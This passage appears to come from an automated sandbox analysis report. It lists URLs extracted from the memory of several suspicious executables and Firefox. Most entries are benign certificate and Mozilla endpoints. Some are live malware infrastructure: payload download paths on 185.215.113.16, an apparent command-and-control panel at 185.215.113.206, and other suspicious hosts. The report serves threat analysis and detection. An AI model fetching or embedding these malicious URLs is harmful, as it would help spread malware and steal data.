Source: e5e907fecb.exe, 0000000F.00000003.3204335566.0000000000ED3000.00000004.00000020.00020000.00000000.sdmp, e5e907fecb.exe, 0000000F.00000002.3277415310.0000000000ED3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exe
Source: e5e907fecb.exe, 0000000F.00000002.3276311001.0000000000CFA000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exepleWebKit/537.36
Source: e5e907fecb.exe, 0000000F.00000003.3204335566.0000000000ED3000.00000004.00000020.00020000.00000000.sdmp, e5e907fecb.exe, 0000000F.00000002.3277415310.0000000000ED3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/steam/random.exe
Source: e5e907fecb.exe, 0000000F.00000003.3205264572.0000000000E58000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16:80/off/def.exe
Source: 3996dc7402.exe, 0000000E.00000002.3218633907.0000000000F7E000.00000004.00000020.00020000.00000000.sdmp, 3996dc7402.exe, 0000000E.00000002.3207489291.00000000005E7000.00000040.00000001.01000000.0000000C.sdmp, 3996dc7402.exe, 0000000E.00000002.3207489291.0000000000504000.00000040.00000001.01000000.0000000C.sdmp, 3996dc7402.exe, 0000000E.00000002.3207489291.0000000000554000.00000040.00000001.01000000.0000000C.sdmp, 3996dc7402.exe, 00000021.00000002.3320048411.000000000117B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206
Source: 3996dc7402.exe, 0000000E.00000002.3218633907.0000000000FC4000.00000004.00000020.00020000.00000000.sdmp, 3996dc7402.exe, 00000021.00000002.3320048411.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, 3996dc7402.exe, 00000021.00000002.3320048411.000000000117B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/
Source: 3996dc7402.exe, 00000021.00000002.3320048411.000000000117B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/.
Source: 3996dc7402.exe, 0000000E.00000002.3218633907.0000000000FFE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/68b591d6548ec281/sqlite3.dll
Source: 3996dc7402.exe, 0000000E.00000002.3218633907.0000000000FFE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/68b591d6548ec281/sqlite3.dllCP
Source: 3996dc7402.exe, 0000000E.00000002.3218633907.0000000000FFE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/68b591d6548ec281/sqlite3.dllU_
Source: 3996dc7402.exe, 0000000E.00000002.3218633907.0000000000FFE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/68b591d6548ec281/sqlite3.dlly_
Source: 3996dc7402.exe, 0000000E.00000002.3207489291.0000000000504000.00000040.00000001.01000000.0000000C.sdmp, 3996dc7402.exe, 0000000E.00000002.3218633907.0000000000FD9000.00000004.00000020.00020000.00000000.sdmp, 3996dc7402.exe, 0000000E.00000002.3207489291.0000000000554000.00000040.00000001.01000000.0000000C.sdmp, 3996dc7402.exe, 00000021.00000002.3320048411.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, 3996dc7402.exe, 00000021.00000002.3320048411.000000000117B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php
Source: 3996dc7402.exe, 00000021.00000002.3320048411.00000000011D3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php&
Source: 3996dc7402.exe, 00000021.00000002.3320048411.00000000011D3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/7
Source: 3996dc7402.exe, 0000000E.00000002.3218633907.0000000000FD9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php:
Source: 3996dc7402.exe, 00000021.00000002.3320048411.00000000011D3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpF
Source: 3996dc7402.exe, 0000000E.00000002.3218633907.0000000000FD9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpN
Source: 3996dc7402.exe, 00000021.00000002.3320048411.000000000117B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpS
Source: 3996dc7402.exe, 0000000E.00000002.3207489291.00000000005E7000.00000040.00000001.01000000.0000000C.sdmp, 3996dc7402.exe, 0000000E.00000002.3207489291.0000000000504000.00000040.00000001.01000000.0000000C.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpinit.exe
Source: 3996dc7402.exe, 0000000E.00000002.3207489291.0000000000554000.00000040.00000001.01000000.0000000C.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpion:
Source: 3996dc7402.exe, 00000021.00000002.3320048411.00000000011D3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpj
Source: 3996dc7402.exe, 0000000E.00000002.3218633907.0000000000FD9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpr
Source: 3996dc7402.exe, 0000000E.00000002.3207489291.00000000005E7000.00000040.00000001.01000000.0000000C.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpser
Source: 3996dc7402.exe, 0000000E.00000002.3218633907.0000000000FD9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php~
Source: 3996dc7402.exe, 0000000E.00000002.3207489291.0000000000554000.00000040.00000001.01000000.0000000C.sdmp String found in binary or memory: http://185.215.113.206BAE
Source: 3996dc7402.exe, 0000000E.00000002.3207489291.0000000000504000.00000040.00000001.01000000.0000000C.sdmp, 3996dc7402.exe, 0000000E.00000002.3207489291.0000000000554000.00000040.00000001.01000000.0000000C.sdmp String found in binary or memory: http://185.215.113.206Local
Source: 3996dc7402.exe, 0000000E.00000002.3207489291.00000000005E7000.00000040.00000001.01000000.0000000C.sdmp String found in binary or memory: http://185.215.113.206s.exe
Source: r5mqFEC.exe, 0000000A.00000003.2526008622.0000000005A53000.00000004.00000800.00020000.00000000.sdmp, e5e907fecb.exe, 0000000F.00000003.2899191317.00000000056F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: r5mqFEC.exe, 0000000A.00000003.2526008622.0000000005A53000.00000004.00000800.00020000.00000000.sdmp, e5e907fecb.exe, 0000000F.00000003.2899191317.00000000056F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: e5e907fecb.exe, 0000000D.00000002.2681648947.0000000001197000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.mH
Source: r5mqFEC.exe, 0000000A.00000003.2654045279.000000000329C000.00000004.00000020.00020000.00000000.sdmp, r5mqFEC.exe, 0000000A.00000002.2666667555.000000000329F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.microsoft
Source: r5mqFEC.exe, 0000000A.00000003.2526008622.0000000005A53000.00000004.00000800.00020000.00000000.sdmp, e5e907fecb.exe, 0000000F.00000003.2899191317.00000000056F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: r5mqFEC.exe, 0000000A.00000003.2526008622.0000000005A53000.00000004.00000800.00020000.00000000.sdmp, e5e907fecb.exe, 0000000F.00000003.2899191317.00000000056F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: r5mqFEC.exe, 0000000A.00000003.2526008622.0000000005A53000.00000004.00000800.00020000.00000000.sdmp, e5e907fecb.exe, 0000000F.00000003.2899191317.00000000056F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: r5mqFEC.exe, 0000000A.00000003.2526008622.0000000005A53000.00000004.00000800.00020000.00000000.sdmp, e5e907fecb.exe, 0000000F.00000003.2899191317.00000000056F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: r5mqFEC.exe, 0000000A.00000003.2526008622.0000000005A53000.00000004.00000800.00020000.00000000.sdmp, e5e907fecb.exe, 0000000F.00000003.2899191317.00000000056F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: firefox.exe, 00000022.00000002.2934934845.000002651AE50000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.2937283139.0000027907E60000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/canonical.html
Source: firefox.exe, 00000022.00000002.2934934845.000002651AE50000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.2937283139.0000027907E60000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/success.txt?ipv4
Source: firefox.exe, 00000022.00000002.2934934845.000002651AE50000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.2937283139.0000027907E60000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/success.txt?ipv6
Source: a7f098a093.exe, 0000000C.00000003.2547058326.0000000007052000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://home.fvtekk5pn.top/LCXOUUtXgrKhKDLYSbzW17
Source: a7f098a093.exe, 0000000C.00000003.3116694621.0000000001272000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://home.fvtekk5pn.top/LCXOUUtXgrKhKDLYSbzW1732019347
Source: a7f098a093.exe, 0000000C.00000003.3116694621.0000000001272000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://home.fvtekk5pn.top/LCXOUUtXgrKhKDLYSbzW17320193476963
Source: a7f098a093.exe, 0000000C.00000003.2547058326.0000000007052000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://html4/loose.dtd
Source: r5mqFEC.exe, 0000000A.00000003.2654045279.000000000329C000.00000004.00000020.00020000.00000000.sdmp, r5mqFEC.exe, 0000000A.00000002.2666667555.000000000329F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://microsoft.co
Source: r5mqFEC.exe, 0000000A.00000003.2526008622.0000000005A53000.00000004.00000800.00020000.00000000.sdmp, e5e907fecb.exe, 0000000F.00000003.2899191317.00000000056F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: r5mqFEC.exe, 0000000A.00000003.2526008622.0000000005A53000.00000004.00000800.00020000.00000000.sdmp, e5e907fecb.exe, 0000000F.00000003.2899191317.00000000056F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: e5e907fecb.exe, 0000000F.00000003.2950450071.0000000000E7A000.00000004.00000020.00020000.00000000.sdmp, e5e907fecb.exe, 0000000F.00000003.2982257579.0000000000E7A000.00000004.00000020.00020000.00000000.sdmp, e5e907fecb.exe, 0000000F.00000003.3061181607.0000000000E7A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.microsoft.ch
Source: 3996dc7402.exe, 0000000E.00000002.3257886939.000000001D6E3000.00000004.00000020.00020000.00000000.sdmp, 3996dc7402.exe, 0000000E.00000002.3262321587.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: r5mqFEC.exe, 0000000A.00000003.2526008622.0000000005A53000.00000004.00000800.00020000.00000000.sdmp, e5e907fecb.exe, 0000000F.00000003.2899191317.00000000056F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.c.lencr.org/0
Source: r5mqFEC.exe, 0000000A.00000003.2526008622.0000000005A53000.00000004.00000800.00020000.00000000.sdmp, e5e907fecb.exe, 0000000F.00000003.2899191317.00000000056F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.i.lencr.org/0
Source: firefox.exe, 00000022.00000002.2934934845.000002651AE50000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.2937283139.0000027907E60000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://%LOCALE%.malware-error.mozilla.com/?url=
Source: firefox.exe, 00000022.00000002.2934934845.000002651AE50000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.2937283139.0000027907E60000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://%LOCALE%.phish-error.mozilla.com/?url=
Source: firefox.exe, 00000022.00000002.2934934845.000002651AE50000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.2937283139.0000027907E60000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://%LOCALE%.phish-report.mozilla.com/?url=
Source: firefox.exe, 00000020.00000003.2853671144.000001D549C77000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2851446106.000001D549A00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2853467336.000001D549C5A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2853199617.000001D549C3C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2852871617.000001D549C1F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.duckduckgo.com/ac/
Source: r5mqFEC.exe, 0000000A.00000003.2461952567.0000000005A69000.00000004.00000800.00020000.00000000.sdmp, r5mqFEC.exe, 0000000A.00000003.2461845852.0000000005A6B000.00000004.00000800.00020000.00000000.sdmp, a7f098a093.exe, 0000000C.00000003.3497708315.000000000163A000.00000004.00000020.00020000.00000000.sdmp, a7f098a093.exe, 0000000C.00000003.3495369049.0000000001638000.00000004.00000020.00020000.00000000.sdmp, a7f098a093.exe, 0000000C.00000003.3496995219.000000000163A000.00000004.00000020.00020000.00000000.sdmp, e5e907fecb.exe, 0000000F.00000003.2826345784.000000000570B000.00000004.00000800.00020000.00000000.sdmp, e5e907fecb.exe, 0000000F.00000003.2826632924.0000000005709000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: firefox.exe, 00000022.00000002.2934934845.000002651AE50000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.2937283139.0000027907E60000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://accounts.firefox.com/
Source: firefox.exe, 00000022.00000002.2934934845.000002651AE50000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.2937283139.0000027907E60000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://accounts.firefox.com/settings/clients
Source: a7f098a093.exe, 0000000C.00000003.2547058326.0000000007052000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://ace-snapper-privately.ngrok-free.app/test/test
Source: a7f098a093.exe, 0000000C.00000003.2547058326.0000000007052000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://ace-snapper-privately.ngrok-free.app/test/testFailed
Source: firefox.exe, 00000022.00000002.2934934845.000002651AE50000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.2937283139.0000027907E60000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/%APP%/blocked-addon/%addonID%/%addonVersion%/
Source: firefox.exe, 00000022.00000002.2934934845.000002651AE50000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.2937283139.0000027907E60000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/
Source: firefox.exe, 00000022.00000002.2934934845.000002651AE50000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.2937283139.0000027907E60000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/language-tools/
Source: firefox.exe, 00000022.00000002.2934934845.000002651AE50000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.2937283139.0000027907E60000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/search-engines/
Source: firefox.exe, 00000022.00000002.2934934845.000002651AE50000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.2937283139.0000027907E60000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/search?q=%TERMS%&platform=%OS%&appver=%VERSION%
Source: firefox.exe, 00000022.00000002.2934934845.000002651AE50000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.2937283139.0000027907E60000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/themes
Source: firefox.exe, 00000022.00000002.2934934845.000002651AE50000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.2937283139.0000027907E60000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://api.accounts.firefox.com/v1
Source: firefox.exe, 00000022.00000002.2934934845.000002651AE50000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.2937283139.0000027907E60000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://apps.apple.com/app/firefox-private-safe-browser/id989804926
Source: firefox.exe, 00000022.00000002.2934934845.000002651AE50000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.2937283139.0000027907E60000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://apps.apple.com/us/app/firefox-private-network-vpn/id1489407738
Source: firefox.exe, 00000022.00000002.2934934845.000002651AE50000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.2937283139.0000027907E60000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/update/3/GMP/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%OS_VER
Source: firefox.exe, 00000022.00000002.2934934845.000002651AE50000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.2937283139.0000027907E60000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/update/3/SystemAddons/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL
Source: firefox.exe, 00000022.00000002.2934934845.000002651AE50000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.2937283139.0000027907E60000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://blocked.cdn.mozilla.net/
Source: firefox.exe, 00000022.00000002.2934934845.000002651AE50000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.2937283139.0000027907E60000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://blocked.cdn.mozilla.net/%blockID%.html
Source: r5mqFEC.exe, 0000000A.00000003.2527758180.0000000005A2C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2935168287.000002651B0E6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.2934533740.00000279078CF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
Source: r5mqFEC.exe, 0000000A.00000003.2527758180.0000000005A2C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2935168287.000002651B0E6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.2934533740.00000279078CF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
Source: r5mqFEC.exe, 0000000A.00000003.2461952567.0000000005A69000.00000004.00000800.00020000.00000000.sdmp, r5mqFEC.exe, 0000000A.00000003.2461845852.0000000005A6B000.00000004.00000800.00020000.00000000.sdmp, a7f098a093.exe, 0000000C.00000003.3497708315.000000000163A000.00000004.00000020.00020000.00000000.sdmp, a7f098a093.exe, 0000000C.00000003.3495369049.0000000001638000.00000004.00000020.00020000.00000000.sdmp, a7f098a093.exe, 0000000C.00000003.3496995219.000000000163A000.00000004.00000020.00020000.00000000.sdmp, e5e907fecb.exe, 0000000F.00000003.2826345784.000000000570B000.00000004.00000800.00020000.00000000.sdmp, e5e907fecb.exe, 0000000F.00000003.2826632924.0000000005709000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: r5mqFEC.exe, 0000000A.00000003.2461952567.0000000005A69000.00000004.00000800.00020000.00000000.sdmp, r5mqFEC.exe, 0000000A.00000003.2461845852.0000000005A6B000.00000004.00000800.00020000.00000000.sdmp, a7f098a093.exe, 0000000C.00000003.3497708315.000000000163A000.00000004.00000020.00020000.00000000.sdmp, a7f098a093.exe, 0000000C.00000003.3495369049.0000000001638000.00000004.00000020.00020000.00000000.sdmp, a7f098a093.exe, 0000000C.00000003.3496995219.000000000163A000.00000004.00000020.00020000.00000000.sdmp, e5e907fecb.exe, 0000000F.00000003.2826345784.000000000570B000.00000004.00000800.00020000.00000000.sdmp, e5e907fecb.exe, 0000000F.00000003.2826632924.0000000005709000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: r5mqFEC.exe, 0000000A.00000003.2461952567.0000000005A69000.00000004.00000800.00020000.00000000.sdmp, r5mqFEC.exe, 0000000A.00000003.2461845852.0000000005A6B000.00000004.00000800.00020000.00000000.sdmp, a7f098a093.exe, 0000000C.00000003.3497708315.000000000163A000.00000004.00000020.00020000.00000000.sdmp, a7f098a093.exe, 0000000C.00000003.3495369049.0000000001638000.00000004.00000020.00020000.00000000.sdmp, a7f098a093.exe, 0000000C.00000003.3496995219.000000000163A000.00000004.00000020.00020000.00000000.sdmp, e5e907fecb.exe, 0000000F.00000003.2826345784.000000000570B000.00000004.00000800.00020000.00000000.sdmp, e5e907fecb.exe, 0000000F.00000003.2826632924.0000000005709000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: firefox.exe, 00000022.00000002.2934934845.000002651AE50000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.2937283139.0000027907E60000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://color.firefox.com/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_content=theme-f
Source: firefox.exe, 00000020.00000003.2853671144.000001D549C77000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2851446106.000001D549A00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2853467336.000001D549C5A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2853199617.000001D549C3C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2852871617.000001D549C1F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://completion.amazon.com/search/complete?q=
Source: firefox.exe, 00000022.00000002.2934934845.000002651AE50000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.2937283139.0000027907E60000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://content.cdn.mozilla.net
Source: r5mqFEC.exe, 0000000A.00000003.2527758180.0000000005A2C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2935168287.000002651B0E6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.2934533740.00000279078CF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: r5mqFEC.exe, 0000000A.00000003.2527758180.0000000005A2C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2935168287.000002651B0E6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.2934533740.00000279078CF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: firefox.exe, 00000022.00000002.2934934845.000002651AE50000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.2937283139.0000027907E60000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://contile.services.mozilla.com/v1/tiles
Source: firefox.exe, 00000022.00000002.2934934845.000002651AE50000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.2937283139.0000027907E60000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://coverage.mozilla.org
Source: firefox.exe, 00000022.00000002.2934934845.000002651AE50000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.2937283139.0000027907E60000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://crash-stats.mozilla.org/report/index/
Source: a7f098a093.exe, 0000000C.00000003.2547058326.0000000007052000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://curl.se/docs/alt-svc.html
Source: a7f098a093.exe, 0000000C.00000003.2547058326.0000000007052000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://curl.se/docs/hsts.html
Source: a7f098a093.exe, 0000000C.00000003.2547058326.0000000007052000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://curl.se/docs/http-cookies.html
Source: firefox.exe, 00000022.00000002.2934934845.000002651AE50000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.2937283139.0000027907E60000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://dap-02.api.divviup.org
Source: firefox.exe, 00000022.00000002.2934934845.000002651AE50000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.2937283139.0000027907E60000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://developers.google.com/safe-browsing/v4/advisory
Source: firefox.exe, 00000020.00000003.2853671144.000001D549C77000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2851446106.000001D549A00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2853467336.000001D549C5A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2853199617.000001D549C3C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2852871617.000001D549C1F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/
Source: r5mqFEC.exe, 0000000A.00000003.2461952567.0000000005A69000.00000004.00000800.00020000.00000000.sdmp, r5mqFEC.exe, 0000000A.00000003.2461845852.0000000005A6B000.00000004.00000800.00020000.00000000.sdmp, a7f098a093.exe, 0000000C.00000003.3495369049.0000000001638000.00000004.00000020.00020000.00000000.sdmp, e5e907fecb.exe, 0000000F.00000003.2826345784.000000000570B000.00000004.00000800.00020000.00000000.sdmp, e5e907fecb.exe, 0000000F.00000003.2826632924.0000000005709000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: r5mqFEC.exe, 0000000A.00000003.2461952567.0000000005A69000.00000004.00000800.00020000.00000000.sdmp, r5mqFEC.exe, 0000000A.00000003.2461845852.0000000005A6B000.00000004.00000800.00020000.00000000.sdmp, a7f098a093.exe, 0000000C.00000003.3495369049.0000000001638000.00000004.00000020.00020000.00000000.sdmp, e5e907fecb.exe, 0000000F.00000003.2826345784.000000000570B000.00000004.00000800.00020000.00000000.sdmp, e5e907fecb.exe, 0000000F.00000003.2826632924.0000000005709000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: r5mqFEC.exe, 0000000A.00000003.2461952567.0000000005A69000.00000004.00000800.00020000.00000000.sdmp, r5mqFEC.exe, 0000000A.00000003.2461845852.0000000005A6B000.00000004.00000800.00020000.00000000.sdmp, a7f098a093.exe, 0000000C.00000003.3495369049.0000000001638000.00000004.00000020.00020000.00000000.sdmp, e5e907fecb.exe, 0000000F.00000003.2826345784.000000000570B000.00000004.00000800.00020000.00000000.sdmp, e5e907fecb.exe, 0000000F.00000003.2826632924.0000000005709000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: firefox.exe, 00000020.00000003.2855347222.000001D547C33000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%s
Source: firefox.exe, 00000020.00000003.2855347222.000001D547C33000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://email.seznam.cz/newMessageScreen?mailto=%s
Source: firefox.exe, 00000022.00000002.2934934845.000002651AE50000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.2937283139.0000027907E60000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://firefox-source-docs.mozilla.org/networking/dns/trr-skip-reasons.html#
Source: firefox.exe, 00000022.00000002.2934934845.000002651AE50000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.2937283139.0000027907E60000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://fpn.firefox.com/browser?utm_source=firefox-desktop&utm_medium=referral&utm_campaign=about-pr
